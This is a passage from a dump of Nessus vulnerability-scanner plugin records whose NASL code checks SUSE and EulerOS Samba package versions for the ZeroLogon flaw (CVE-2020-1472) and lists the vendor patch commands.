reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:25:19", "description": "According to the version of the samba packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-30T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:libwbclient", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:samba-client-libs", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-common-libs", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-python", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-2299.NASL", "href": "https://www.tenable.com/plugins/nessus/142110", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142110);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"EulerOS 2.0 SP5 : samba (EulerOS-SA-2020-2299)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2299\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb63ee7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.7.1-9.h21.eulerosv2r7\",\n \"libwbclient-4.7.1-9.h21.eulerosv2r7\",\n \"samba-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-4.7.1-9.h21.eulerosv2r7\",\n \"samba-client-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-common-tools-4.7.1-9.h21.eulerosv2r7\",\n \"samba-libs-4.7.1-9.h21.eulerosv2r7\",\n \"samba-python-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-clients-4.7.1-9.h21.eulerosv2r7\",\n \"samba-winbind-modules-4.7.1-9.h21.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:33", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nAdd 'libsmbldap0' to 'libsmbldap2' package to fix upgrades from previous versions. (bsc#1172810)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : samba (SUSE-SU-2020:2719-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy0", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2719-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2719-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143641);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES15 Security Update : samba (SUSE-SU-2020:2719-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nAdd 'libsmbldap0' to 'libsmbldap2' package to fix upgrades from\nprevious versions. (bsc#1172810)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202719-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a28b90e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-2719=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-2719=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2719=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2719=1\n\nSUSE Linux Enterprise High Availability 15 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-2020-2719=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 